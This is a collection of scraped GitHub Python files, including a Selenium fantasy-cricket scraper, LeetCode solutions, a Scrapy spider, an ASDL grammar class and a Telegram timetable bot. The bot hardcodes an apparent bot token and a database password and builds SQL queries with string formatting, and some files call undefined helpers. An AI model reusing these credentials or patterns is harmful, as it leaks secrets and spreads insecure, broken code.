self.obj.get_xpath(\n 
\"Players_bowlers\"))\n for each_ele in total_bowls:\n player_name = self.obj.get_text_from_element(\n self.obj.wait_for_element_inside_webelement(each_ele, self.obj.get_xpath(\n \"Player_name_text\")))\n self.logger.info(\"Clicking on info\")\n time.sleep(3)\n self.obj.wait_for_element_inside_webelement(each_ele, self.obj.get_xpath(\n \"Info_link\")).click()\n self.logger.info(\"Getting Info\")\n time.sleep(3)\n player_percentage = self.obj.get_text_from_element(\n self.obj.wait_for_element(self.driver, self.obj.get_xpath(\n \"Player_percentage_text\")))\n players_bowl[player_name] = float(player_percentage)\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Popup_close\"))\n # Getting Allrounders info\n self.logger.info(\"Clicking on AR tab\")\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Ar_tab_link\"))\n self.logger.info(\"Getting AllRounders info...\") \n total_ars = self.obj.wait_for_elements(self.driver, self.obj.get_xpath(\n \"Players_allrounders\"))\n for each_ele in total_ars:\n player_name = self.obj.get_text_from_element(\n self.obj.wait_for_element_inside_webelement(each_ele, self.obj.get_xpath(\n \"Player_name_text\")))\n self.logger.info(\"Clicking on info\")\n time.sleep(3)\n self.obj.wait_for_element_inside_webelement(each_ele, self.obj.get_xpath(\n \"Info_link\")).click()\n self.logger.info(\"Getting Info\")\n time.sleep(3)\n player_percentage = self.obj.get_text_from_element(\n self.obj.wait_for_element(self.driver, self.obj.get_xpath(\n \"Player_percentage_text\")))\n players_ar[player_name] = float(player_percentage)\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Popup_close\"))\n # Getting Wicket-Keepers info\n self.logger.info(\"Clicking on WK tab\")\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Wk_tab_link\"))\n self.logger.info(\"Getting Wicket-Keepers info...\") \n total_wks = self.obj.wait_for_elements(self.driver, self.obj.get_xpath(\n \"Players_wicketkeepers\"))\n for each_ele in total_wks:\n player_name = self.obj.get_text_from_element(\n self.obj.wait_for_element_inside_webelement(each_ele, self.obj.get_xpath(\n \"Player_name_text\")))\n self.logger.info(\"Clicking on info\")\n time.sleep(3)\n self.obj.wait_for_element_inside_webelement(each_ele, self.obj.get_xpath(\n \"Info_link\")).click()\n self.logger.info(\"Getting Info\")\n time.sleep(3)\n player_percentage = self.obj.get_text_from_element(\n self.obj.wait_for_element(self.driver, self.obj.get_xpath(\n \"Player_percentage_text\")))\n players_wk[player_name] = float(player_percentage)\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Popup_close\"))\n sorted_bat = sorted(players_bat.items(), key=operator.itemgetter(1), reverse=True)\n self.write_to_players('BAT', OrderedDict(sorted_bat))\n sorted_wk = sorted(players_wk.items(), key=operator.itemgetter(1), reverse=True)\n self.write_to_players('WK', OrderedDict(sorted_wk))\n sorted_bowl = sorted(players_bowl.items(), key=operator.itemgetter(1), reverse=True)\n self.write_to_players('BOWL', OrderedDict(sorted_bowl))\n sorted_ar = sorted(players_ar.items(), key=operator.itemgetter(1), reverse=True)\n self.write_to_players('AR', OrderedDict(sorted_ar))\n\n except Exception:\n self.logger.info(\"Exception Occurred... 
writing to the log file\")\n self.file_logger.debug(traceback.format_exc())\n finally:\n # Logout\n self.driver.get(self.obj.get_xpath(\"Target_URL\"))\n time.sleep(5)\n self.logger.info(\"Logging out...\")\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Team_dropdown\"))\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Logout_btn\"))\n\n except WebDriverException:\n self.logger.info(\"Exception Occurred... writing to the log file\")\n self.file_logger.debug(traceback.format_exc())\n finally:\n if self.driver:\n self.driver.quit()\n else:\n print(\"Driver not initialized\")\n\n @staticmethod\n def write_to_players(section_name, data):\n \"\"\"\n This function takes section_name and data and\n writes them to the players.txt file.\n @param: section_name: str: section name to be written\n @param: data: OrderedDict: players data to be written\n \"\"\"\n fp = open('players.txt', 'a')\n config.add_section(section_name)\n for key, value in data.items():\n config.set(section_name, key, str(value))\n config.write(fp)\n fp.close()\n\n\nclass Dream11Exception(Exception):\n \"\"\"\n Custom Exception Class \n \"\"\"\n\n def __init__(self, message):\n super(Dream11Exception, self).__init__(message)\n self.message = message\n\n def __str__(self):\n return self.message\n\n\ndef construct_ordered_dict_from_players(section_name):\n res = list()\n config.read('players.txt')\n options = config.options(section_name)\n for option in options:\n res.append((option, config.get(section_name, option)))\n return OrderedDict(res)\n\n\ndef read_from_players():\n player_dict = dict()\n player_dict['BAT'] = construct_ordered_dict_from_players('BAT')\n player_dict['WK'] = construct_ordered_dict_from_players('WK')\n player_dict['BOWL'] = construct_ordered_dict_from_players('BOWL')\n player_dict['AR'] = construct_ordered_dict_from_players('AR')\n return player_dict\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"A utility that reads\\\n the given file having two team players\\\n separated by commas and generate required\\\n number of pairs of cap and vice-cap\")\n arg_group = parser.add_argument_group(\"Required Arguments\")\n arg_group.add_argument(\"-s\", \"--sortby\", required=False, help=\"An argument\\\n which tells to sort by player name or odds?\")\n arg_group.add_argument(\"-d\", \"--usedf\", required=False, help=\"This tells \\\n whether to use DataFrames or not\")\n args = parser.parse_args()\n sortby = args.sortby if args.sortby else 1\n use_df = args.usedf if args.usedf else 0\n if args.usedf:\n try:\n use_df = int(use_df)\n except ValueError:\n raise ValueError(\"-d argument should be an integer\")\n try:\n sortby = int(sortby)\n except ValueError:\n raise ValueError(\"-s argument should be an integer\")\n obj = Dream11()\n obj.get_data()","repo_name":"Abhioo8/dream11-team-select","sub_path":"get_player_odds.py","file_name":"get_player_odds.py","file_ext":"py","file_size_in_byte":12196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
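# A stdlib round-trip sketch of the players.txt format that write_to_players() and
# construct_ordered_dict_from_players() above agree on (one section per role,
# "name = odds" pairs; the player name and odds here are invented):
from configparser import ConfigParser

cfg = ConfigParser()
cfg.optionxform = str  # keep player-name case, as the script does
cfg.add_section("BAT")
cfg.set("BAT", "V Kohli", "78.4")
with open("players.txt", "w") as fp:
    cfg.write(fp)

cfg2 = ConfigParser()
cfg2.optionxform = str
cfg2.read("players.txt")
print(dict(cfg2.items("BAT")))  # {'V Kohli': '78.4'}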
+{"seq_id":"7874704042","text":"\"\"\"\nName: byroncbr_11.py\nAuthor: bangrenc\nTime: 5/7/2020 3:39 PM\n\"\"\"\n\ndef maxArea(height):\n length = len(height)\n f = 0\n l = length\n m_area = 0\n\n for i in range(length):\n if height[f] > height[l-1]:\n area = (length-i-1) * height[l-1]\n l = l - 1\n\n else:\n area = (length-i-1) * height[f]\n f = f + 1\n\n if area > m_area:\n m_area = area\n\n return m_area\n\nif __name__ == '__main__':\n test = [1,8,6,2,5,4,8,3,7]\n result = maxArea(test)\n print(result)\n\n\n","repo_name":"bangrenc/learnGit","sub_path":"byroncbr_11.py","file_name":"byroncbr_11.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
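# Why the pointer moves in maxArea() above are safe: once the shorter side is fixed,
# every narrower container is capped by that same height, so only the shorter side is
# worth moving. A brute-force cross-check on small random inputs (assumes maxArea
# above is importable in the same module):
from itertools import combinations
from random import randint

def brute_force(h):
    return max((j - i) * min(h[i], h[j]) for i, j in combinations(range(len(h)), 2))

for _ in range(100):
    h = [randint(1, 9) for _ in range(10)]
    assert maxArea(h) == brute_force(h)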
+{"seq_id":"14373281364","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom yangguang.items import YangguangItem\n\n\nclass YgSpider(scrapy.Spider):\n\tname = 'yg'\n\tallowed_domains = ['wz.sun0769.com']\n\tstart_urls = ['http://wz.sun0769.com/index.php/question/questionType?type=4&page=0']\n\n\tdef parse(self, response): # extract the data from the list page\n\t\t# 1. extract the data on the current page\n\t\t# group first, then extract\n\t\ttr_list = response.xpath(\"//div[@class='greyframe']/table[2]/tr/td/table/tr\")\n\t\tprint(tr_list)\n\t\tfor tr in tr_list:\n\t\t\titem = YangguangItem()\n\t\t\titem[\"num\"] = tr.xpath(\"./td[1]/text()\").extract_first()\n\t\t\titem[\"title\"] = tr.xpath(\"./td[2]/a[2]/text()\").extract_first()\n\t\t\titem[\"href\"] = tr.xpath(\"./td[2]/a[2]/@href\").extract_first()\n\t\t\titem[\"status\"] = tr.xpath(\"./td[3]/span/text()\").extract_first()\n\t\t\titem[\"name\"] = tr.xpath(\"./td[4]/text()\").extract_first()\n\t\t\titem[\"publish_date\"] = tr.xpath(\"./td[5]/text()\").extract_first()\n\t\t\t# yield scrapy.Request(\n\t\t\t# \titem[\"href\"],\n\t\t\t# \tcallback=self.parse_detail,\n\t\t\t# \tmeta={\"a\": item}\n\t\t\t# )\n\t\t\tprint(item)\n\n\t\t# 2. build the request for the next page (pagination)\n\t\tnext_url = response.xpath(\"//a[text()='>']/@href\").extract_first()\n\t\tif next_url is not None:\n\t\t\t# build the request\n\t\t\tyield scrapy.Request(next_url, callback=self.parse)\n\n\tdef parse_detail(self, response): # extract the data from the detail page\n\t\titem = response.meta[\"a\"]\n\t\titem[\"img\"] = response.xpath(\"//div[@class='textpic']/img/@src\").extract_first()\n\t\titem[\"content\"] = response.xpath(\"//div[@class='c1 text14_2']//text()\").extract()\n\t\tprint(item)\n\t\t# yield item\n","repo_name":"mufengpy/spider-yangguang","sub_path":"yangguang/spiders/yg.py","file_name":"yg.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"73809188882","text":"class Solution:\n class Tape:\n # tape = repeated pattern + word\n def __init__(self, last_word: str, pattern_len: int, total_len: int) -> None:\n self.last_word = last_word\n self.pattern_len = pattern_len\n self.total_len = total_len\n\n def solve(self, tapes: list[Tape], idx: int):\n for i in range(len(tapes) - 1, 0, -1):\n cur_tape, prev_tape = tapes[i], tapes[i - 1]\n idx %= cur_tape.pattern_len\n if idx >= prev_tape.total_len:\n if prev_tape.total_len:\n idx = idx % prev_tape.total_len\n return cur_tape.last_word[idx]\n\n def add_tape(self, tapes: list[Tape], word: str, c: str | int):\n pattern_len = tapes[-1].total_len + len(word)\n total_len = pattern_len * int(c)\n tape = self.Tape(word, pattern_len, total_len)\n tapes.append(tape)\n\n def decodeAtIndex(self, s: str, k: int) -> str:\n tapes = [self.Tape(\"\", 0, 0)]\n word = \"\"\n for c in s:\n if c.isalpha():\n word += c\n else:\n self.add_tape(tapes, word, c)\n word = \"\"\n if word:\n self.add_tape(tapes, word, 1)\n\n return self.solve(tapes, k - 1)\n","repo_name":"Ismail-Mahmoud/Competitive-Programming","sub_path":"Problems/LeetCode/880.Decoded-String-at-Index.py","file_name":"880.Decoded-String-at-Index.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
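# A quick check of the class above against the classic LeetCode 880 example:
# "leet2code3" decodes to "leetleetcode" repeated three times, whose 10th letter is "o".
print(Solution().decodeAtIndex("leet2code3", 10))  # -> "o"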
+{"seq_id":"71448191123","text":"# coding: utf-8\nimport sys\nimport os\nsys.path.append('..')\ntry:\n import urllib.request\nexcept ImportError:\n raise ImportError('Use Python3!')\nimport pickle\nimport numpy as np\n\nvocab_file = 'ptb.vocab.pkl'\n\ndataset_dir = os.path.dirname(os.path.abspath(__file__))\n\ndef load_vocab():\n # build the save path for the vocabulary file\n vocab_path = dataset_dir + '/' + vocab_file \n\n # check whether the vocabulary file already exists\n if os.path.exists(vocab_path):\n with open(vocab_path, 'rb') as f:\n word_to_id, id_to_word = pickle.load(f)\n return word_to_id, id_to_word\n\n # initialize the vocabulary mappings\n word_to_id = {}\n id_to_word = {}\n\n # load (download) the training data (needs changing: key_file and _download are not defined in this file)\n data_type = 'train'\n file_name = key_file[data_type]\n file_path = dataset_dir + '/' + file_name\n\n _download(file_name)\n\n # build the word list (needs changing)\n words = open(file_path).read().replace('\\n', '<eos>').strip().split()\n\n for i, word in enumerate(words):\n if word not in word_to_id:\n tmp_id = len(word_to_id)\n word_to_id[word] = tmp_id\n id_to_word[tmp_id] = word\n\n with open(vocab_path, 'wb') as f:\n pickle.dump((word_to_id, id_to_word), f)\n\n return word_to_id, id_to_word\n\n","repo_name":"yy006/replication","sub_path":"IP2Vec/dataset/bcd.py","file_name":"bcd.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23387172689","text":"# This test compares the efficiency of + versus join() when concatenating strings\n\nimport time\n\n# concatenate strings with +\ntime01 = time.time() # start time\n\ns = \"\"\n\nfor i in range(100000):\n s += \"str\"\n\ntime02 = time.time()\nprint(\"delta={0}\".format(time02 - time01))\n\n\n# concatenate strings with join\nl = []\nfor i in range(100000):\n l.append(\"str\")\n\ntime01 = time.time() # start time\n\ns = \"\"\ns = \"\".join(l)\n\ntime02 = time.time()\nprint(\"delta={0}\".format(time02 - time01))\n","repo_name":"YingnanHan/Python-400-Series","sub_path":"Python 400 集/Chapter02 内置数据类型/37.综合测试.py","file_name":"37.综合测试.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"}
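# A tighter comparison with the stdlib timeit module: here the join variant also pays
# for building its input inside the timed region, unlike the test above where the
# list is prepared before timing starts:
import timeit

plus = timeit.timeit('s = ""\nfor _ in range(100000): s += "str"', number=10)
join = timeit.timeit('s = "".join("str" for _ in range(100000))', number=10)
print(f"+= : {plus:.3f}s   join: {join:.3f}s")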
+{"seq_id":"2840487403","text":"\"\"\"\nEnglish grammar and typing system\n\"\"\"\nfrom collections import OrderedDict\n\nfrom multivac.src.gan.gen_pyt.asdl.asdl import (ASDLCompositeType,\n ASDLConstructor, ASDLGrammar,\n ASDLPrimitiveType,\n ASDLProduction, Field)\nfrom multivac.src.gan.gen_pyt.asdl.lang.eng.eng_asdl_helper import \\\n english_ast_to_asdl_ast\nfrom multivac.src.gan.gen_pyt.asdl.lang.grammar import Grammar\n\nBRACKET_TYPES = {\n ASDLPrimitiveType('-LRB-'): '(',\n ASDLPrimitiveType('-RRB-'): ')',\n ASDLPrimitiveType('-LCB-'): '{',\n ASDLPrimitiveType('-RCB-'): '}',\n ASDLPrimitiveType('-LSB-'): '[',\n ASDLPrimitiveType('-RSB-'): ']',\n}\n\nTERMINAL_TYPES = {\n ASDLPrimitiveType('CC'), # Coordinating conjunction\n ASDLPrimitiveType('CD'), # Cardinal number\n ASDLPrimitiveType('DT'), # Determiner\n ASDLPrimitiveType('EX'), # Existential there\n ASDLPrimitiveType('FW'), # Foreign word\n ASDLPrimitiveType('IN'), # Preposition or subordinating conjunction\n ASDLPrimitiveType('JJ'), # Adjective\n ASDLPrimitiveType('JJR'), # Adjective, comparative\n ASDLPrimitiveType('JJS'), # Adjective, superlative\n ASDLPrimitiveType('LS'), # List item marker\n ASDLPrimitiveType('MD'), # Modals\n ASDLPrimitiveType('NN'), # Noun, singular or mass\n ASDLPrimitiveType('NNS'), # Noun, plural\n ASDLPrimitiveType('NNP'), # Proper noun, singular\n ASDLPrimitiveType('NNPS'), # Proper noun, plural\n ASDLPrimitiveType('PDT'), # Predeterminer\n ASDLPrimitiveType('POS'), # Possessive ending\n ASDLPrimitiveType('PRP'), # Personal pronoun\n ASDLPrimitiveType('PRP$'), # Possessive pronoun (prolog version PRP-S)\n ASDLPrimitiveType('RB'), # Adverb\n ASDLPrimitiveType('RBR'), # Adverb, comparative\n ASDLPrimitiveType('RBS'), # Adverb, superlative\n ASDLPrimitiveType('RP'), # Particle\n ASDLPrimitiveType('SYM'), # Symbol\n ASDLPrimitiveType('TO'), # to\n ASDLPrimitiveType('UH'), # Interjection\n ASDLPrimitiveType('VB'), # Verb, base form\n ASDLPrimitiveType('VBD'), # Verb, past tense\n ASDLPrimitiveType('VBG'), # Verb, gerund or present participle\n ASDLPrimitiveType('VBN'), # Verb, past participle\n ASDLPrimitiveType('VBP'), # Verb, non-3rd person singular present\n ASDLPrimitiveType('VBZ'), # Verb, 3rd person singular present\n ASDLPrimitiveType('WDT'), # Wh-determiner\n ASDLPrimitiveType('WP'), # Wh-pronoun\n ASDLPrimitiveType('WP$'), # Possessive wh-pronoun (prolog version WP-S)\n ASDLPrimitiveType('WRB') # Wh-adverb\n}\n\n\nclass EnglishGrammar(Grammar):\n\n def __init__(self, rules):\n super().__init__(rules)\n\n self.terminal_types.update(TERMINAL_TYPES)\n self.terminal_types.update(BRACKET_TYPES)\n\n\nclass EnglishASDLGrammar(ASDLGrammar):\n \"\"\"\n Collection of types, constructors and productions\n \"\"\"\n\n def __init__(self, grammar=None, productions=None):\n # productions are indexed by their head types\n self._productions = OrderedDict()\n self._constructor_production_map = dict()\n\n if productions is not None:\n english_prods = set(productions)\n\n for prod in english_prods:\n if prod.type not in self._productions:\n self._productions[prod.type] = list()\n self._productions[prod.type].append(prod)\n self._constructor_production_map[prod.constructor.name] = prod\n\n self.root_type = ASDLCompositeType(\"ROOT\")\n elif grammar is not None:\n if isinstance(grammar, ASDLGrammar):\n self = grammar\n return\n\n for rule in grammar.rules:\n fields = []\n\n for child in rule.children:\n if grammar.is_terminal(child):\n child_type = ASDLPrimitiveType(child.type)\n else:\n child_type = 
ASDLCompositeType(child.type)\n\n fields.append(Field(child.type, child_type, 'single'))\n\n constructor = ASDLConstructor(rule.type, fields)\n production = ASDLProduction(ASDLCompositeType(rule.type),\n constructor)\n\n if production.type not in self._productions:\n self._productions[production.type] = list()\n\n self._productions[production.type].append(production)\n self._constructor_production_map[constructor.name] = production\n\n self.root_type = ASDLCompositeType(grammar.root_node.type)\n\n self.size = sum(len(head) for head in self._productions.values())\n self.terminal_types = set(self.primitive_types)\n self.terminal_types.update(TERMINAL_TYPES)\n self.terminal_types.update(BRACKET_TYPES.keys())\n\n self._types = sorted(self.terminal_types.union(set(self.types)),\n key=lambda x: x.name)\n\n # map entities to their ids\n self.prod2id = {prod: i for i, prod in enumerate(self.productions)}\n self.type2id = {type: i for i, type in enumerate(self.types)}\n self.field2id = {field: i for i, field in enumerate(self.fields)}\n\n self.id2prod = {i: prod for i, prod in enumerate(self.productions)}\n self.id2type = {i: type for i, type in enumerate(self.types)}\n self.id2field = {i: field for i, field in enumerate(self.fields)}\n\n @staticmethod\n def from_text(text, parser):\n productions = set()\n\n if isinstance(text, str):\n text = text.split('\\n')\n\n for s in text:\n try:\n p = parser.get_parse(s)['sentences'][0]['parse']\n except Exception:\n continue\n try:\n parse_tree = english_ast_to_asdl_ast(p.parse_string)\n except Exception:\n continue\n\n productions.update(parse_tree.get_productions())\n\n productions = sorted(productions, key=repr)\n\n grammar = EnglishASDLGrammar(productions=productions)\n return grammar\n","repo_name":"GallupGovt/multivac","sub_path":"src/gan/gen_pyt/asdl/lang/eng/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"3"}
+{"seq_id":"37468913727","text":"import datetime\r\nimport psycopg2\r\nimport telebot\r\nfrom telebot import types\r\n\r\ntoken = \"2113287709:AAEQLuoZQRTeaK3Bqk46A-mNl9xGw_qDo1w\"\r\nbot = telebot.TeleBot(token)\r\ndate = datetime.date.today().isocalendar()[1]\r\n\r\nconn = psycopg2.connect(database=\"postgres\",\r\n user=\"postgres\",\r\n password=\"3308_Blbgh\",\r\n host=\"localhost\",\r\n port=\"5432\")\r\n\r\ncursor = conn.cursor()\r\n\r\n\r\n@bot.message_handler(commands=['start'])\r\ndef start(message):\r\n keyboard = types.ReplyKeyboardMarkup()\r\n keyboard.row(\"Понедельник\", \"Вторник\", \"Среда\", \"Четверг\", \"Пятница\", \"Расписание на текущую неделю\",\r\n \"Расписание на следующую неделю\")\r\n bot.send_message(message.chat.id, 'Здесь можно посмотреть расписание БФИ2102', reply_markup=keyboard)\r\n\r\n\r\n@bot.message_handler(commands=['week'])\r\ndef week(message):\r\n if date % 2 == 0:\r\n bot.send_message(message.chat.id, 'Сейчас нижняя неделя')\r\n if date % 2 == 1:\r\n bot.send_message(message.chat.id, 'Сейчас верхняя неделя')\r\n\r\n\r\n@bot.message_handler(commands=['help'])\r\ndef help_message(message):\r\n bot.send_message(message.chat.id, '''Данный бот присылает расписание.\r\n\r\n /week - Текущая неделя\r\n /help - Помощь\r\n /mtuci - Ссылка на официальный сайт МТУСИ''')\r\n\r\n@bot.message_handler(commands=['mtuci'])\r\ndef mtuci(message):\r\n bot.send_message(message.chat.id, 'https://mtuci.ru/')\r\n\r\n@bot.message_handler(content_types=['text'])\r\ndef dododo(message):\r\n days = ['Понедельник', 'Вторник', 'Среда', 'Четверг', 'Пятница']\r\n week = datetime.date.today().isocalendar()[1] % 2\r\n table = 'service.timetable_odd' if week else 'service.timetable_even'\r\n\r\n if message.text == \"Понедельник\" or message.text == \"Вторник\" or message.text == \"Среда\" or message.text == \"Четверг\" or message.text == \"Пятница\":\r\n try:\r\n\r\n cursor.execute(\r\n \"SELECT subject, room_numb, start_time FROM {} WHERE day='{}'\".format(table, message.text))\r\n result = cursor.fetchall()\r\n to_print = []\r\n for i in result:\r\n to_print.append(', '.join(i) + '\\n')\r\n\r\n bot.send_message(message.chat.id, ''.join(to_print))\r\n except:\r\n bot.send_message(message.chat.id, 'Пар нет')\r\n\r\n\r\n\r\n elif message.text == 'Расписание на текущую неделю':\r\n to_print = []\r\n for day in days:\r\n cursor.execute(\r\n \"SELECT subject, room_numb, start_time FROM {} WHERE day='{}'\".format(table, day))\r\n result = cursor.fetchall()\r\n tmp = []\r\n tmp.append(day + '\\n' + '_________\\n')\r\n for i in result:\r\n tmp.append(', '.join(i) + '\\n')\r\n to_print.append(''.join(tmp) + '\\n')\r\n bot.send_message(message.chat.id, ''.join(to_print))\r\n\r\n elif message.text == 'Расписание на следующую неделю':\r\n to_print = []\r\n table = 'service.timetable_odd' if table == 'service.timetable_even' else 'service.timetable_even'\r\n for day in days:\r\n cursor.execute(\r\n \"SELECT subject, room_numb, start_time FROM {} WHERE day='{}'\".format(table, day))\r\n result = cursor.fetchall()\r\n tmp = []\r\n tmp.append(day + '\\n' + '_________\\n')\r\n for i in result:\r\n tmp.append(', '.join(i) + '\\n')\r\n to_print.append(''.join(tmp) + '\\n')\r\n table = 'service.timetable_odd' if table == 'service.timetable_even' else 'service.timetable_even'\r\n bot.send_message(message.chat.id, 
''.join(to_print))\r\n\r\n\r\nbot.polling()","repo_name":"maxim1903/mtuci","sub_path":"timetable_bot-main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
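# A sketch of the same day lookup with psycopg2's parameter passing instead of
# str.format, so the value never reaches the SQL text directly (table names still
# need psycopg2.sql, because placeholders only work for values). Reuses the `cursor`
# created in the script above:
from psycopg2 import sql

query = sql.SQL("SELECT subject, room_numb, start_time FROM {} WHERE day = %s").format(
    sql.Identifier("service", "timetable_odd"))
cursor.execute(query, ("Понедельник",))
result = cursor.fetchall()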
+{"seq_id":"40681911603","text":"\"\"\"Conftest for xknxproject.\"\"\"\nimport json\nfrom test import STUBS_PATH\n\nfrom xknxproject.models import KNXProject\n\n\ndef assert_stub(to_be_verified: KNXProject, stub_name: str) -> None:\n \"\"\"Assert input matched loaded stub file.\"\"\"\n stub_path = STUBS_PATH / stub_name\n\n def remove_xknxproject_version(obj: KNXProject) -> KNXProject:\n \"\"\"Remove xknxproject_version from object.\"\"\"\n version_string = obj[\"info\"].pop(\"xknxproject_version\")\n assert len(version_string.split(\".\")) == 3\n return obj\n\n with open(stub_path, encoding=\"utf-8\") as stub_file:\n stub = remove_xknxproject_version(json.load(stub_file))\n to_be_verified = remove_xknxproject_version(to_be_verified)\n for key, value in stub.items():\n assert key in to_be_verified, f\"`{key}` key missing in generated object\"\n assert value == to_be_verified[key], f\"`{key}` item does not match\"\n\n for key in to_be_verified.keys():\n assert key in stub, f\"`{key}` key of generated object missing in stub\"\n","repo_name":"XKNX/xknxproject","sub_path":"test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"3"}
+{"seq_id":"6269669727","text":"\n#_ Condition strings\ndef solution(ineq, eq, n, m):\n if eq == '!':\n answer = eval(str(n) + ineq + str(m))\n else:\n answer = eval(str(n) + ineq + eq + str(m))\n return answer * 1\n\n# # another solution\ndef solution(ineq, eq, n, m):\n return int(eval(str(n) + ineq + eq.replace('!', '') + str(m)))\n\n# # another solution\ndef solution(ineq, eq, n, m):\n answer = 0\n if n > m and ineq ==\">\":\n answer = 1\n elif n < m and ineq == \"<\":\n answer = 1\n elif n == m and eq == \"=\":\n answer = 1\n return answer\n\n#_ Swap the characters, then search\ndef solution(myString, pat):\n table = myString.maketrans({'A':'B', 'B':'A'})\n value = myString.translate(table)\n return 1 if pat in value else 0\n\n# # another solution\ndef solution(myString, pat):\n tmp = ''\n for word in myString:\n if word == \"A\":\n word = \"B\"\n else:\n word = \"A\"\n \n tmp += word\n # tmp.find(pat) >= 0 : pat exists in tmp.\n # tmp.find(pat) != -1 : pat is not absent from tmp\n return int(tmp.find(pat) >= 0)\n\n# # another solution\ndef solution(myString, pat): \n tmp = ''.join([\"B\" if i == \"A\" else \"A\" for i in myString]) \n return int(pat in tmp)\n\n#_ Append each element as many times as its value\ndef solution(arr):\n answer = []\n for num in arr:\n for _ in range(num):\n answer.append(num)\n return answer\n\n# # another solution\ndef solution(arr):\n answer = []\n for num in arr:\n answer += [num] * num\n return answer\n\n","repo_name":"hayeonkimmie/Programmers","sub_path":"jieun/programmers/basic/230622.py","file_name":"230622.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"ko","doc_type":"code","dataset":"github-code","pt":"3"}
+{"seq_id":"4884954490","text":"import os\nimport numpy as np\nfrom PIL import Image\nimport scipy, scipy.io\nfrom easydict import EasyDict\nfrom collections import OrderedDict\nfrom torch.utils.data import Dataset\nfrom torchvision import datasets, transforms\nfrom celeba import CelebA\nimport torchvision.transforms.functional as F\n\nclass Crop(object):\n def __init__(self, x1, x2, y1, y2):\n self.x1 = x1\n self.x2 = x2\n self.y1 = y1\n self.y2 = y2\n\n def __call__(self, img):\n return F.crop(img, self.x1, self.y1, self.x2 - self.x1, self.y2 - self.y1)\n\n def __repr__(self):\n return self.__class__.__name__ + \"(x1={}, x2={}, y1={}, y2={})\".format(\n self.x1, self.x2, self.y1, self.y2\n )\n\ndef fix_legacy_dict(d):\n keys = list(d.keys())\n if \"model\" in keys:\n d = d[\"model\"]\n if \"state_dict\" in keys:\n d = d[\"state_dict\"]\n keys = list(d.keys())\n # remove multi-gpu module.\n if \"module.\" in keys[1]:\n d = remove_module(d)\n return d\n \n\ndef get_dataset(name, data_dir):\n \"\"\"\n Return a dataset with the current name. We only support two datasets with\n their fixed image resolutions. One can easily add additional datasets here.\n\n Note: To avoid learning the distribution of transformed data, don't use heavy\n data augmentation with diffusion models.\n \"\"\"\n if name == \"mnist\":\n transform_train = transforms.Compose(\n [\n transforms.ToTensor(),\n ]\n )\n train_set = datasets.MNIST(\n root=data_dir,\n train=True,\n download=True,\n transform=transform_train,\n )\n elif name == \"mnist_m\":\n transform_train = transforms.Compose(\n [\n transforms.ToTensor(),\n ]\n )\n train_set = datasets.ImageFolder(\n data_dir,\n transform=transform_train,\n )\n elif name == \"cifar10\":\n transform_train = transforms.Compose(\n [\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n ]\n )\n train_set = datasets.CIFAR10(\n root=data_dir,\n train=True,\n download=True,\n transform=transform_train,\n )\n elif name == \"celeba64\":\n # celebA has a large number of images, avoiding randomcropping.\n\n cx = 89\n cy = 121\n x1 = cy - 64\n x2 = cy + 64\n y1 = cx - 64\n y2 = cx + 64\n train_set = CelebA(\n root=os.path.join(data_dir),\n split=\"train\",\n transform=transforms.Compose(\n [\n Crop(x1, x2, y1, y2),\n transforms.Resize(64),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n ]\n ),\n download = True\n )\n # transform_train = transforms.Compose(\n # [\n # transforms.Resize(64),\n # transforms.CenterCrop(64),\n # transforms.RandomHorizontalFlip(),\n # transforms.ToTensor(),\n # ]\n # )\n # train_set = datasets.ImageFolder(\n # data_dir,\n # transform=transform_train,\n # )\n elif name == \"cars\":\n transform_train = transforms.Compose(\n [\n transforms.Resize(64),\n transforms.RandomCrop(64),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n ]\n )\n train_set = datasets.ImageFolder(\n data_dir,\n transform=transform_train,\n )\n elif name == \"flowers\":\n transform_train = transforms.Compose(\n [\n transforms.Resize(64),\n transforms.RandomCrop(64),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n ]\n )\n splits = scipy.io.loadmat(os.path.join(data_dir, \"setid.mat\"))\n labels = scipy.io.loadmat(os.path.join(data_dir, \"imagelabels.mat\"))\n labels = labels[\"labels\"][0]\n train_set = oxford_flowers_dataset(\n np.concatenate((splits[\"trnid\"][0], splits[\"valid\"][0]), axis=0),\n labels,\n data_dir,\n transform_train,\n )\n elif name == \"gtsrb\":\n # celebA has a large number of images, avoiding randomcropping.\n 
